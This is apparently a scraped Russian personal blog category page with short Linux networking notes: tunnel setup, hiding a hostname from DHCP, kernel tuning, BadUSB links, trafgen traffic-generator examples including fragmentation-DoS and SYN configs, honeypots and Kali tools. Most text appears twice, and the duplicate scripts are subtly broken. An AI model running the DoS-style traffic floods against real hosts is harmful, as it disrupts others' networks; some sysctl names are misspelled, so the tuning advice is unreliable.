Рубрика: kali \ virus \ rootkit \ вирусы \ защита

kali \ virus \ rootkit \ вирусы \ защита

Тунели / tunnel

Автор записи Автор: Evgeny Yakovlev
Дата записи 2024/12/10

Виды:

GRE-туннель (Generic Routing Encapsulation)
GRE (Generic Routing Encapsulation) — это протокол, 
который позволяет инкапсулировать различные сетевые протоколы в IP-пакетах, 
создавая туннель между двумя конечными точками. 
Это позволяет передавать пакеты через общую сеть (например, через интернет) как если бы они находились в частной сети.


IPIP (IP-in-IP) — это ещё один протокол туннелирования, 
который работает схоже с GRE, но он только инкапсулирует IP-пакеты в IP.
Это довольно простое решение для создания туннеля.

GREtap — это расширение GRE-туннеля, которое добавляет возможность работать с Ethernet-кадрами, а не только с IP-пакетами. 
Это позволяет передавать кадры уровня канала передачи данных (L2), что полезно для создания виртуальных локальных сетей (VLAN).

VXLAN (Virtual Extensible LAN) — это протокол, предназначенный для создания туннелей уровня L2 поверх IP-сети. 
Он использует UDP-порты (чаще всего 4789) для инкапсуляции Ethernet-кадров, 
что позволяет строить виртуальные локальные сети через общедоступные сети.


GRE подходит для гибких решений, позволяя инкапсулировать различные протоколы.
IPIP проще и используется для передачи только IP-пакетов.
GREtap расширяет возможности GRE, добавляя поддержку канала L2.
VXLAN — это решение для построения виртуальных L2-сетей поверх IP

GRE-туннель (Generic Routing Encapsulation)

GRE (Generic Routing Encapsulation) — это протокол,

который позволяет инкапсулировать различные сетевые протоколы в IP-пакетах,

создавая туннель между двумя конечными точками.

Это позволяет передавать пакеты через общую сеть (например, через интернет) как если бы они находились в частной сети.

IPIP (IP-in-IP) — это ещё один протокол туннелирования,

который работает схоже с GRE, но он только инкапсулирует IP-пакеты в IP.

Это довольно простое решение для создания туннеля.

GREtap — это расширение GRE-туннеля, которое добавляет возможность работать с Ethernet-кадрами, а не только с IP-пакетами.

Это позволяет передавать кадры уровня канала передачи данных (L2), что полезно для создания виртуальных локальных сетей (VLAN).

VXLAN (Virtual Extensible LAN) — это протокол, предназначенный для создания туннелей уровня L2 поверх IP-сети.

Он использует UDP-порты (чаще всего 4789) для инкапсуляции Ethernet-кадров,

что позволяет строить виртуальные локальные сети через общедоступные сети.

GRE подходит для гибких решений, позволяя инкапсулировать различные протоколы.

IPIP проще и используется для передачи только IP-пакетов.

GREtap расширяет возможности GRE, добавляя поддержку канала L2.

VXLAN — это решение для построения виртуальных L2-сетей поверх IP

Настройка:

GRE-туннель
ip link add name gretunnel type gre local 10.0.0.1 remote 10.0.0.2
ip addr add 192.168.0.1/24 dev gretunnel
ip link set dev gretunnel up

IPIP-туннель
ip tunnel add ipiptunnel mode ipip local 10.0.0.1 remote 10.0.0.2
ip addr add 192.168.0.1/24 dev ipiptunnel
ip link set dev ipiptunnel up


GRE+Ethernet (GREtap)
ip link add name gretap tunnel local 10.0.0.1 remote 10.0.0.2 ttl 255
ip addr add 192.168.0.1/24 dev gretap


VXLAN
ip link add vxlan0 type vxlan id 42 dev eth0 remote 10.0.0.2 dstport 4789
ip addr add 192.168.0.1/24 dev vxlan0
ip link set dev vxlan0 up

GRE-туннель

ip link add name gretunnel type gre local 10.0.0.1 remote 10.0.0.2

ip addr add 192.168.0.1/24 dev gretunnel

ip link set dev gretunnel up

IPIP-туннель

ip tunnel add ipiptunnel mode ipip local 10.0.0.1 remote 10.0.0.2

ip addr add 192.168.0.1/24 dev ipiptunnel

ip link set dev ipiptunnel up

GRE+Ethernet (GREtap)

ip link add name gretap tunnel local 10.0.0.1 remote 10.0.0.2 ttl 255

ip addr add 192.168.0.1/24 dev gretap

VXLAN

ip link add vxlan0 type vxlan id 42 dev eth0 remote 10.0.0.2 dstport 4789

ip addr add 192.168.0.1/24 dev vxlan0

ip link set dev vxlan0 up

kali \ virus \ rootkit \ вирусы \ защита

Убираем лишний шум при подключение хоста к сети

Автор записи Автор: Evgeny Yakovlev
Дата записи 2024/12/09

Смена имени хоста (hostname):

Смена имени хоста (hostname)
sudo hostnamectl set-hostname <новое_имя_хоста>
Пример:
sudo hostnamectl set-hostname mypc

Если команды hostnamectl нет, можно отредактировать файл:
vim /etc/hostname

Редактирование файла hosts
vim /etc/hosts 
Найдите строку с текущим именем хоста и замените его на новое. 
Она должна выглядеть примерно так:
--------------
127.0.0.1   localhost
127.0.1.1   mypc
-------------

Перезагружаем систему
reboot

Если у вас ультелиты systemctl все таки есть то можно так:
systemctl restart systemd-hostnamed

Смена имени хоста (hostname)

sudo hostnamectl set-hostname <новое_имя_хоста>

Пример:

sudo hostnamectl set-hostname mypc

Если команды hostnamectl нет, можно отредактировать файл:

vim /etc/hostname

Редактирование файла hosts

vim /etc/hosts

Найдите строку с текущим именем хоста и замените его на новое.

Она должна выглядеть примерно так:

--------------

127.0.0.1 localhost

127.0.1.1 mypc

-------------

Перезагружаем систему

reboot

Если у вас ультелиты systemctl все таки есть то можно так:

systemctl restart systemd-hostnamed

Отключение передачи имени хоста через DHCP

Изменение настроек DHCP-клиента:
vim /etc/dhcp/dhclient.conf
---------------------------
send host-name "";
---------------------------

Обновление настроек NetworkManager (если используете):
vim /etc/NetworkManager/NetworkManager.conf
-------------------------------------------
[main]
dhcp=dhclient

[dhcp]
send-hostname=false
-------------------------------------------

Перезапустите службу NetworkManager:
systemctl restart NetworkManager

Изменение настроек DHCP-клиента:

vim /etc/dhcp/dhclient.conf

---------------------------

send host-name "";

---------------------------

Обновление настроек NetworkManager (если используете):

vim /etc/NetworkManager/NetworkManager.conf

-------------------------------------------

[main]

dhcp=dhclient

[dhcp]

send-hostname=false

-------------------------------------------

Перезапустите службу NetworkManager:

systemctl restart NetworkManager

Использование sed для автоматического редактирования файлов:

0. Изменение имени хоста:
Вот как можно внести изменения в файлы /etc/hostname, /etc/hosts, /etc/dhcp/dhclient.conf, и /etc/NetworkManager/NetworkManager.conf:
NEW_HOSTNAME="mypc"

# Изменение имени хоста в /etc/hostname
sudo sed -i "s/.*/$NEW_HOSTNAME/" /etc/hostname

# Изменение имени хоста в /etc/hosts
sudo sed -i "s/^\(127\.0\.1\.1\s*\).*/\1$NEW_HOSTNAME/" /etc/hosts


1. Отключение передачи имени хоста в DHCP
Для /etc/dhcp/dhclient.conf:
sudo sed -i "/^send host-name/ s|.*|send host-name \"\";|" /etc/dhcp/dhclient.conf
sudo grep -q "^send host-name" /etc/dhcp/dhclient.conf || echo 'send host-name "";' | sudo tee -a /etc/dhcp/dhclient.conf
Для /etc/NetworkManager/NetworkManager.conf:
Убедимся, что параметры dhcp=dhclient и send-hostname=false добавлены:
sudo sed -i "/^\[main\]/,/^\[/ s/^dhcp=.*/dhcp=dhclient/" /etc/NetworkManager/NetworkManager.conf
sudo sed -i "/^\[dhcp\]/,/^\[/ s/^send-hostname=.*/send-hostname=false/" /etc/NetworkManager/NetworkManager.conf
# Добавляем секции, если их нет
sudo grep -q "^\[main\]" /etc/NetworkManager/NetworkManager.conf || echo -e "\n[main]\ndhcp=dhclient" | sudo tee -a /etc/NetworkManager/NetworkManager.conf
sudo grep -q "^\[dhcp\]" /etc/NetworkManager/NetworkManager.conf || echo -e "\n[dhcp]\nsend-hostname=false" | sudo tee -a /etc/NetworkManager/NetworkManager.conf

2. После внесения изменений перезапустите службы:
sudo systemctl restart systemd-hostnamed
sudo systemctl restart networking
sudo systemctl restart NetworkManager

0. Изменение имени хоста:

Вот как можно внести изменения в файлы /etc/hostname, /etc/hosts, /etc/dhcp/dhclient.conf, и /etc/NetworkManager/NetworkManager.conf:

NEW_HOSTNAME="mypc"

# Изменение имени хоста в /etc/hostname

sudo sed -i "s/.*/$NEW_HOSTNAME/" /etc/hostname

# Изменение имени хоста в /etc/hosts

sudo sed -i "s/^$127\.0\.1\.1\s*$.*/\1$NEW_HOSTNAME/" /etc/hosts

1. Отключение передачи имени хоста в DHCP

Для /etc/dhcp/dhclient.conf:

sudo sed -i "/^send host-name/ s|.*|send host-name \"\";|" /etc/dhcp/dhclient.conf

sudo grep -q "^send host-name" /etc/dhcp/dhclient.conf || echo 'send host-name "";' | sudo tee -a /etc/dhcp/dhclient.conf

Для /etc/NetworkManager/NetworkManager.conf:

Убедимся, что параметры dhcp=dhclient и send-hostname=false добавлены:

sudo sed -i "/^\[main\]/,/^\[/ s/^dhcp=.*/dhcp=dhclient/" /etc/NetworkManager/NetworkManager.conf

sudo sed -i "/^\[dhcp\]/,/^\[/ s/^send-hostname=.*/send-hostname=false/" /etc/NetworkManager/NetworkManager.conf

# Добавляем секции, если их нет

sudo grep -q "^\[main\]" /etc/NetworkManager/NetworkManager.conf || echo -e "\n[main]\ndhcp=dhclient" | sudo tee -a /etc/NetworkManager/NetworkManager.conf

sudo grep -q "^\[dhcp\]" /etc/NetworkManager/NetworkManager.conf || echo -e "\n[dhcp]\nsend-hostname=false" | sudo tee -a /etc/NetworkManager/NetworkManager.conf

2. После внесения изменений перезапустите службы:

sudo systemctl restart systemd-hostnamed

sudo systemctl restart networking

sudo systemctl restart NetworkManager

Скрипт на баше:

#!/bin/bash

# Убедимся, что скрипт запускается с правами root
if [[ $EUID -ne 0 ]]; then
   echo "Этот скрипт необходимо запускать с правами root." 
   exit 1
fi

# Новое имя хоста
NEW_HOSTNAME="mypc"

# Файлы для редактирования
HOSTNAME_FILE="/etc/hostname"
HOSTS_FILE="/etc/hosts"
DHCLIENT_FILE="/etc/dhcp/dhclient.conf"
NETWORK_MANAGER_FILE="/etc/NetworkManager/NetworkManager.conf"

echo "1. Изменяем имя хоста..."
# Изменение имени хоста в /etc/hostname
sed -i "s/.*/$NEW_HOSTNAME/" "$HOSTNAME_FILE"

# Изменение имени хоста в /etc/hosts
sed -i "s/^\(127\.0\.1\.1\s*\).*/\1$NEW_HOSTNAME/" "$HOSTS_FILE"

echo "2. Отключаем передачу имени хоста через DHCP..."
# Настройка /etc/dhcp/dhclient.conf
if grep -q "^send host-name" "$DHCLIENT_FILE"; then
    sed -i "/^send host-name/ s|.*|send host-name \"\";|" "$DHCLIENT_FILE"
else
    echo 'send host-name "";' >> "$DHCLIENT_FILE"
fi

# Настройка /etc/NetworkManager/NetworkManager.conf
if grep -q "^\[main\]" "$NETWORK_MANAGER_FILE"; then
    sed -i "/^\[main\]/,/^\[/ s/^dhcp=.*/dhcp=dhclient/" "$NETWORK_MANAGER_FILE"
else
    echo -e "\n[main]\ndhcp=dhclient" >> "$NETWORK_MANAGER_FILE"
fi

if grep -q "^\[dhcp\]" "$NETWORK_MANAGER_FILE"; then
    sed -i "/^\[dhcp\]/,/^\[/ s/^send-hostname=.*/send-hostname=false/" "$NETWORK_MANAGER_FILE"
else
    echo -e "\n[dhcp]\nsend-hostname=false" >> "$NETWORK_MANAGER_FILE"
fi

echo "3. Перезапускаем службы..."
# Перезапуск служб для применения изменений
systemctl restart systemd-hostnamed
systemctl restart networking
systemctl restart NetworkManager

echo "Изменения применены!"
echo "Проверка текущего имени хоста:"
hostnamectl

#!/bin/bash

# Убедимся, что скрипт запускается с правами root

if [[ $EUID -ne 0 ]]; then

echo "Этот скрипт необходимо запускать с правами root."

exit 1

# Новое имя хоста

NEW_HOSTNAME="mypc"

# Файлы для редактирования

HOSTNAME_FILE="/etc/hostname"

HOSTS_FILE="/etc/hosts"

DHCLIENT_FILE="/etc/dhcp/dhclient.conf"

NETWORK_MANAGER_FILE="/etc/NetworkManager/NetworkManager.conf"

echo "1. Изменяем имя хоста..."

# Изменение имени хоста в /etc/hostname

sed -i "s/.*/$NEW_HOSTNAME/" "$HOSTNAME_FILE"

# Изменение имени хоста в /etc/hosts

sed -i "s/^$127\.0\.1\.1\s*$.*/\1$NEW_HOSTNAME/" "$HOSTS_FILE"

echo "2. Отключаем передачу имени хоста через DHCP..."

# Настройка /etc/dhcp/dhclient.conf

if grep -q "^send host-name" "$DHCLIENT_FILE"; then

sed -i "/^send host-name/ s|.*|send host-name \"\";|" "$DHCLIENT_FILE"

else

echo 'send host-name "";' >> "$DHCLIENT_FILE"

# Настройка /etc/NetworkManager/NetworkManager.conf

if grep -q "^\[main\]" "$NETWORK_MANAGER_FILE"; then

sed -i "/^\[main\]/,/^\[/ s/^dhcp=.*/dhcp=dhclient/" "$NETWORK_MANAGER_FILE"

else

echo -e "\n[main]\ndhcp=dhclient" >> "$NETWORK_MANAGER_FILE"

if grep -q "^\[dhcp\]" "$NETWORK_MANAGER_FILE"; then

sed -i "/^\[dhcp\]/,/^\[/ s/^send-hostname=.*/send-hostname=false/" "$NETWORK_MANAGER_FILE"

else

echo -e "\n[dhcp]\nsend-hostname=false" >> "$NETWORK_MANAGER_FILE"

echo "3. Перезапускаем службы..."

# Перезапуск служб для применения изменений

systemctl restart systemd-hostnamed

systemctl restart networking

systemctl restart NetworkManager

echo "Изменения применены!"

echo "Проверка текущего имени хоста:"

hostnamectl

Проверка:

Убедитесь, что имя хоста изменилось:
hostnamectl

Проверьте файл /etc/hosts и /etc/hostname:
cat /etc/hosts
cat /etc/hostname

Проверка сетевого демона:
systemctl status networking

Слушаем трафик:
sudo tcpdump -i eth0 port 67 or port 68

Убедитесь, что имя хоста изменилось:

hostnamectl

Проверьте файл /etc/hosts и /etc/hostname:

cat /etc/hosts

cat /etc/hostname

Проверка сетевого демона:

systemctl status networking

Слушаем трафик:

sudo tcpdump -i eth0 port 67 or port 68

kali \ virus \ rootkit \ вирусы \ защита Конспект

Минимальная настройка ядра linux для обработки значительного трафика / производительность

Автор записи Автор: Evgeny Yakovlev
Дата записи 2024/12/09

Пример:

sysctl -w fs.file-max=100000
sysctl -w net.core.somaxconn=65535
sysctl -w net.core.netdev_max_blacklog=65536
sysctl -w net.ipv4.tcp_fin_timeout=15
sysctl -w net.ipv4.tcp_tw_reuse=1
sysctl -w net.ipv4.tcp_tw_recycle=1
sysctl -w net.ipv4.tcp_max_tw_buckets=65536
sysctl -w net.ipv4.tcp_window_scalling=1

sysctl -w fs.file-max=100000

sysctl -w net.core.somaxconn=65535

sysctl -w net.core.netdev_max_blacklog=65536

sysctl -w net.ipv4.tcp_fin_timeout=15

sysctl -w net.ipv4.tcp_tw_reuse=1

sysctl -w net.ipv4.tcp_tw_recycle=1

sysctl -w net.ipv4.tcp_max_tw_buckets=65536

sysctl -w net.ipv4.tcp_window_scalling=1

Для любознательных что есть что:

net.core.somaxconn=65535 
Задает максимальное кол-во соединений, которые могут ожидать обработки в очереди. 
Важно для приложений.


net.core.netdev_max_blacklog=65536
Определяет максимальный размер очереди сетевых устройств обрабатывающих трафик

net.ipv4.tcp_fin_timeout=15
Время до ожидания завершения соединения (флаг fin)

net.ipv4.tcp_tw_reuse=1
Разрешаем использования сокетов TIME-WAIT для новых соединений.
По факту разрешает использования портов в статусе TIME-WAIT для новых соединений.

net.ipv4.tcp_tw_recycle=1
Активирует режим повторного использования портов в статусе TIME-WAIT.

net.ipv4.tcp_max_tw_buckets=65536
Увеличиваем кол-во сокетов time-wait

net.ipv4.tcp_window_scalling=1
Управляет масштабированием окна TCP. Увеличиваем размер TCP-окна если это возможно

net.core.somaxconn=65535

Задает максимальное кол-во соединений, которые могут ожидать обработки в очереди.

Важно для приложений.

net.core.netdev_max_blacklog=65536

Определяет максимальный размер очереди сетевых устройств обрабатывающих трафик

net.ipv4.tcp_fin_timeout=15

Время до ожидания завершения соединения (флаг fin)

net.ipv4.tcp_tw_reuse=1

Разрешаем использования сокетов TIME-WAIT для новых соединений.

По факту разрешает использования портов в статусе TIME-WAIT для новых соединений.

net.ipv4.tcp_tw_recycle=1

Активирует режим повторного использования портов в статусе TIME-WAIT.

net.ipv4.tcp_max_tw_buckets=65536

Увеличиваем кол-во сокетов time-wait

net.ipv4.tcp_window_scalling=1

Управляет масштабированием окна TCP. Увеличиваем размер TCP-окна если это возможно

ссылка с одной шляпой….

https://zip.bhv.ru/9785977519953.zip

1	https://zip.bhv.ru/9785977519953.zip

kali \ virus \ rootkit \ вирусы \ защита

badusb

Автор записи Автор: Evgeny Yakovlev
Дата записи 2022/12/29

Ссылки:

https://aliexpress.ru/wholesale?SearchText=badusb
https://github.com/topics/badusb
https://github.com/robertio/DM-3212-Badusb/blob/master/README.md
https://github.com/wangwei39120157028/BadUSB
https://github.com/asciiterminal/CJMCU_ATMEGA32U4_BADUSB
https://github.com/TheMMcOfficial/CJMCU-3212-wifi_ducky
https://github.com/joelsernamoreno/badusb_sd_wifi
https://www.youtube.com/watch?v=G-Z2rf_AN-c&ab_channel=%D0%9D%D0%BE%D0%9A%D0%BE%D0%BC%D0%BF

https://aliexpress.ru/wholesale?SearchText=badusb

https://github.com/topics/badusb

https://github.com/robertio/DM-3212-Badusb/blob/master/README.md

https://github.com/wangwei39120157028/BadUSB

https://github.com/asciiterminal/CJMCU_ATMEGA32U4_BADUSB

https://github.com/TheMMcOfficial/CJMCU-3212-wifi_ducky

https://github.com/joelsernamoreno/badusb_sd_wifi

https://www.youtube.com/watch?v=G-Z2rf_AN-c&ab_channel=%D0%9D%D0%BE%D0%9A%D0%BE%D0%BC%D0%BF

kali \ virus \ rootkit \ вирусы \ защита

Генератор трафика / тест rfc2544 / netsniff-ng / trafgen

Автор записи Автор: Evgeny Yakovlev
Дата записи 2022/12/29

Ссылки:

http://netsniff-ng.org/
https://github.com/jonschipp/gencfg
https://github.com/netsniff-ng/netsniff-ng
https://man7.org/linux/man-pages/man8/trafgen.8.html

http://netsniff-ng.org/

https://github.com/jonschipp/gencfg

https://github.com/netsniff-ng/netsniff-ng

https://man7.org/linux/man-pages/man8/trafgen.8.html

0. Ставим пакеты
apt install netsniff-ng git  
 
1. Скачиваем в удобное место генератор конфигов для gentraf
 git clone https://github.com/jonschipp/gencfg.git 

2.  Собираем конфиг для gentraf
/gencfg.sh -G rfc2544 -s 192.168.88.61 -d 192.168.88.1  -m 52:54:00:27:f8:a0 -M b6:1d:99:22:dd:07
G rfc2544  - желаемый тест
-s 192.168.88.61  - source, источник трафика окуда будем запускать генератор
-d 192.168.88.1 -  dist, куда трафик должен прилететь
-m 52:54:00:27:f8:a0 - мак источника 
-M b6:1d:99:22:dd:07 - мак назначения

3. Запуск генерации трафика 
trafgen --dev enp1s0 --conf rfc2544-1672235689/1024.cfg
--dev enp1s0 - интерфейс
--conf rfc2544-1672235689/1024.cfg - конфиг размер пакета 1024 (Внимание там в каталоге есть еще конфиги)

4. Далее мы можем наблюдать с помощью любого снифера как наш трафик летит
tcpdump
netsniff-ng 
Используй следующие:
ifpps

0. Ставим пакеты

apt install netsniff-ng git

1. Скачиваем в удобное место генератор конфигов для gentraf

git clone https://github.com/jonschipp/gencfg.git

2. Собираем конфиг для gentraf

/gencfg.sh -G rfc2544 -s 192.168.88.61 -d 192.168.88.1 -m 52:54:00:27:f8:a0 -M b6:1d:99:22:dd:07

G rfc2544 - желаемый тест

-s 192.168.88.61 - source, источник трафика окуда будем запускать генератор

-d 192.168.88.1 - dist, куда трафик должен прилететь

-m 52:54:00:27:f8:a0 - мак источника

-M b6:1d:99:22:dd:07 - мак назначения

3. Запуск генерации трафика

trafgen --dev enp1s0 --conf rfc2544-1672235689/1024.cfg

--dev enp1s0 - интерфейс

--conf rfc2544-1672235689/1024.cfg - конфиг размер пакета 1024 (Внимание там в каталоге есть еще конфиги)

4. Далее мы можем наблюдать с помощью любого снифера как наш трафик летит

tcpdump

netsniff-ng

Используй следующие:

ifpps

trafgen примеры:

trafgen --dev eth0 --conf trafgen.cfg
              Это самое простое и, наверное, самое распространенное использование трафген. 
              Он будет генерировать трафик, определенный в файл конфигурации ''trafgen.cfg'' и передать его через сетевое устройство eth0. 
              Используются все процессоры онлайн.

trafgen --dev eth0 --conf trafgen.cfg --cpus 2-4
              Вместо того, чтобы использовать все онлайн-процессоры, передавайте трафик из ЦП 2, 3 и 4.

trafgen -e | trafgen -i - -o lo --cpp -n 1
              Это пример, когда мы отправляем один пакет встроенного например через петлевое устройство. 
              Пример конфигурация передается через стандартный ввод, а также через C процессор до того, как его увидит компилятор пакетов trafgen.

trafgen --dev eth0 --conf fuzzing.cfg --smoke-test 10.0.0.1
              Прочтите файл конфигурации пакета ''fuzzing.cfg'' (который содержит вызовы drnd()) и отправляет сгенерированные пакеты к устройству eth0. 
              После каждого отправленного пакета проверка связи атакуемый хост с адресом 10.0.0.1, чтобы проверить, еще жив. 
              Это также означает, что мы используем только 1 ЦП, и не используйте TX_RING, а отправляйте(2) пакетный ввод-вывод из-за в «медленный режим».

trafgen --dev wlan0 --rfraw --conf beacon-test.txf -V --cpus 2
              В качестве устройства вывода используется ''wlan0'' и помещается в режим мониторинга, поэтому мы собираемся передавать сырой 802.11 кадры по воздуху. 
              Используйте ''beacon-test.txf'' файл конфигурации, установите trafgen в подробный режим и используйте только 2 CPU, начиная с CPU 0.

trafgen --dev em1 --conf frag_dos.cfg --rand --gap 1000us
              Используйте trafgen в режиме sendto(2) вместо режима TX_RING и спать после каждого отправленного пакета статический временной интервал на 1000 мкс.
              Сгенерируйте пакеты из ''frag_dos.cfg'' и выберите следующий пакеты для отправки случайным образом, а не циклическим способом.
              Выходным устройством для пакетов является ''em1''.

trafgen --dev eth0 --conf icmp.cfg --rand --num 1400000 -k1000
              Отправьте только 1400000 пакетов, используя ''icmp.cfg'' файл конфигурации, а затем выйдите из trafgen. 
              Выбрать пакеты случайным образом из этого файла для передачи и отправить их через eth0. 
              Кроме того, запускайте ядро каждые 1000 мкс для группирование кольцевых кадров из пользовательского пространства (по умолчанию 10us).

trafgen --dev eth0 --conf tcp_syn.cfg -u `id -u bob` -g `id -g bob`
              Отправка пакетов, сгенерированных из файла конфигурации tcp_syn.cfg через сетевое устройство eth0. 
              После настроить кольцо для передачи, сбросить учетные данные на пользователь без полномочий root/группа bob/bob.

trafgen --dev eth0 '{ fill(0xff, 6), 0x00, 0x02, 0xb3, rnd(3), c16(0x0800), fill(0xca, 64) }' -n 1
              Отправьте 1 недействительный пакет IPv4, созданный из командной строки, на все хосты.

trafgen --dev eth0 --conf trafgen.cfg

Это самое простое и, наверное, самое распространенное использование трафген.

Он будет генерировать трафик, определенный в файл конфигурации ''trafgen.cfg'' и передать его через сетевое устройство eth0.

Используются все процессоры онлайн.

trafgen --dev eth0 --conf trafgen.cfg --cpus 2-4

Вместо того, чтобы использовать все онлайн-процессоры, передавайте трафик из ЦП 2, 3 и 4.

trafgen -e | trafgen -i - -o lo --cpp -n 1

Это пример, когда мы отправляем один пакет встроенного например через петлевое устройство.

Пример конфигурация передается через стандартный ввод, а также через C процессор до того, как его увидит компилятор пакетов trafgen.

trafgen --dev eth0 --conf fuzzing.cfg --smoke-test 10.0.0.1

Прочтите файл конфигурации пакета ''fuzzing.cfg'' (который содержит вызовы drnd()) и отправляет сгенерированные пакеты к устройству eth0.

После каждого отправленного пакета проверка связи атакуемый хост с адресом 10.0.0.1, чтобы проверить, еще жив.

Это также означает, что мы используем только 1 ЦП, и не используйте TX_RING, а отправляйте(2) пакетный ввод-вывод из-за в «медленный режим».

trafgen --dev wlan0 --rfraw --conf beacon-test.txf -V --cpus 2

В качестве устройства вывода используется ''wlan0'' и помещается в режим мониторинга, поэтому мы собираемся передавать сырой 802.11 кадры по воздуху.

Используйте ''beacon-test.txf'' файл конфигурации, установите trafgen в подробный режим и используйте только 2 CPU, начиная с CPU 0.

trafgen --dev em1 --conf frag_dos.cfg --rand --gap 1000us

Используйте trafgen в режиме sendto(2) вместо режима TX_RING и спать после каждого отправленного пакета статический временной интервал на 1000 мкс.

Сгенерируйте пакеты из ''frag_dos.cfg'' и выберите следующий пакеты для отправки случайным образом, а не циклическим способом.

Выходным устройством для пакетов является ''em1''.

trafgen --dev eth0 --conf icmp.cfg --rand --num 1400000 -k1000

Отправьте только 1400000 пакетов, используя ''icmp.cfg'' файл конфигурации, а затем выйдите из trafgen.

Выбрать пакеты случайным образом из этого файла для передачи и отправить их через eth0.

Кроме того, запускайте ядро каждые 1000 мкс для группирование кольцевых кадров из пользовательского пространства (по умолчанию 10us).

trafgen --dev eth0 --conf tcp_syn.cfg -u `id -u bob` -g `id -g bob`

Отправка пакетов, сгенерированных из файла конфигурации tcp_syn.cfg через сетевое устройство eth0.

После настроить кольцо для передачи, сбросить учетные данные на пользователь без полномочий root/группа bob/bob.

trafgen --dev eth0 '{ fill(0xff, 6), 0x00, 0x02, 0xb3, rnd(3), c16(0x0800), fill(0xca, 64) }' -n 1

Отправьте 1 недействительный пакет IPv4, созданный из командной строки, на все хосты.

kali \ virus \ rootkit \ вирусы \ защита

honeypot

Автор записи Автор: Evgeny Yakovlev
Дата записи 2022/01/11

Ссылки:

https://opencanary.readthedocs.io/en/latest/starting/configuration.html
https://jasonmurray.org/posts/2021/opencanary/
https://github.com/thinkst/opencanary
https://github.com/pwnlandia/mhn
https://github.com/technicaldada/pentbox
https://en.iguru.gr/dimiourgia-honeypot-sto-kali-linux-pentbox/
https://itsecforu.ru/2018/03/19/%D0%BD%D0%B0%D1%81%D1%82%D1%80%D0%BE%D0%B9%D0%BA%D0%B0-honeypot-%D0%B2-kali-linux-pentbox/
https://github.com/thinkst/opencanary/wiki
https://habr.com/ru/company/alexhost/blog/528796/

https://kali.tools/all/?

https://opencanary.readthedocs.io/en/latest/starting/configuration.html

https://jasonmurray.org/posts/2021/opencanary/

https://github.com/thinkst/opencanary

https://github.com/pwnlandia/mhn

https://github.com/technicaldada/pentbox

https://en.iguru.gr/dimiourgia-honeypot-sto-kali-linux-pentbox/

https://itsecforu.ru/2018/03/19/%D0%BD%D0%B0%D1%81%D1%82%D1%80%D0%BE%D0%B9%D0%BA%D0%B0-honeypot-%D0%B2-kali-linux-pentbox/

https://github.com/thinkst/opencanary/wiki

https://habr.com/ru/company/alexhost/blog/528796/

https://kali.tools/all/?

Вроде как актуально:

opencanary

https://opencanary.readthedocs.io/en/latest/starting/configuration.html
https://jasonmurray.org/posts/2021/opencanary/

opencanary

https://opencanary.readthedocs.io/en/latest/starting/configuration.html

https://jasonmurray.org/posts/2021/opencanary/

kali \ virus \ rootkit \ вирусы \ защита

Kali Undercover Mode ( оформление windows 10 для linux )

Автор записи Автор: Evgeny Yakovlev
Дата записи 2020/05/15

Ссылки :

В последнем обновлении популярный среди безопасников и хакеров дистрибутив Kali Linux получил любопытный режим «Undercover» — «под прикрытием», 
суть которого сводится к визуальной мимикрии под графическую оболочку Windows.

http://compizomania.blogspot.com/2019/12/kali-undercover-mode-xfce-linux.html
https://habr.com/ru/company/dcmiran/blog/478314/

В последнем обновлении популярный среди безопасников и хакеров дистрибутив Kali Linux получил любопытный режим «Undercover» — «под прикрытием»,

суть которого сводится к визуальной мимикрии под графическую оболочку Windows.

http://compizomania.blogspot.com/2019/12/kali-undercover-mode-xfce-linux.html

https://habr.com/ru/company/dcmiran/blog/478314/

Установка:

0. Xfce +  Whiske
sudo apt-get update - прежде всего обновим список пакетов
sudo apt-get install xfce4 -y - затем установим основные компоненты рабочего стола xfce
sudo apt-get install xfce4-goodies -y - теперь добавим дополнительные компоненты командой
sudo apt-get install task-xfce-desktop - решение проблемы с ярлыками
sudo apt-get install xfce4-whiskermenu-plugin

 
 
1. Качаем и ставим undercover
wget  http://archive.kali.org/kali/pool/main/k/kali-undercover/kali-undercover_2019.4.1_all.deb
sudo dpkg -i kali-undercover_2019.4.1_all.deb


git clone https://gitlab.com/kalilinux/packages/kali-undercover
cd ~/kali-undercover
sudo cp -r share /usr/
sudo cp bin/kali-undercover /usr/bin/

2. По умолчанию в скрипте на установку задействована только светлая тема оформления приложений, 
но желающие могут добавить тёмную тему того же автора, выполнив следующие команды в терминале:

cd /tmp; wget https://github.com/B00merang-Project/Windows-10-Dark/archive/master.zip
unzip master.zip
sudo mv Windows-10-Dark-master /usr/share/themes

3. Если вы передумаете и решите полностью удалить Kali Undercover Mode, 
перейдите на оформление XFCE и выполните в терминале следующие команды на удаление:

sudo rm /usr/bin/kali-undercover
sudo rm /usr/share/applications/kali-undercover.desktop
sudo rm -r /usr/share/icons/Windows-10-Icons
sudo rm -r /usr/share/themes/Windows-10
sudo rm -r /usr/share/kali-undercover

0. Xfce + Whiske

sudo apt-get update - прежде всего обновим список пакетов

sudo apt-get install xfce4 -y - затем установим основные компоненты рабочего стола xfce

sudo apt-get install xfce4-goodies -y - теперь добавим дополнительные компоненты командой

sudo apt-get install task-xfce-desktop - решение проблемы с ярлыками

sudo apt-get install xfce4-whiskermenu-plugin

1. Качаем и ставим undercover

wget http://archive.kali.org/kali/pool/main/k/kali-undercover/kali-undercover_2019.4.1_all.deb

sudo dpkg -i kali-undercover_2019.4.1_all.deb

git clone https://gitlab.com/kalilinux/packages/kali-undercover

cd ~/kali-undercover

sudo cp -r share /usr/

sudo cp bin/kali-undercover /usr/bin/

2. По умолчанию в скрипте на установку задействована только светлая тема оформления приложений,

но желающие могут добавить тёмную тему того же автора, выполнив следующие команды в терминале:

cd /tmp; wget https://github.com/B00merang-Project/Windows-10-Dark/archive/master.zip

unzip master.zip

sudo mv Windows-10-Dark-master /usr/share/themes

3. Если вы передумаете и решите полностью удалить Kali Undercover Mode,

перейдите на оформление XFCE и выполните в терминале следующие команды на удаление:

sudo rm /usr/bin/kali-undercover

sudo rm /usr/share/applications/kali-undercover.desktop

sudo rm -r /usr/share/icons/Windows-10-Icons

sudo rm -r /usr/share/themes/Windows-10

sudo rm -r /usr/share/kali-undercover

kali \ virus \ rootkit \ вирусы \ защита

Tool-X

Автор записи Автор: Evgeny Yakovlev
Дата записи 2020/03/21

ссылки

https://github.com/rajkumardusad/Tool-X
https://amitego.ru/community-2/main-category/tool-x-eto-odnim-slovom-ustanovshhik-hakerskih-programm/

1 2	https://github.com/rajkumardusad/Tool-X https://amitego.ru/community-2/main-category/tool-x-eto-odnim-slovom-ustanovshhik-hakerskih-programm/

установка

sudo apt update - обновляем установленные пакеты 
sudo apt install git - устанавливаем git
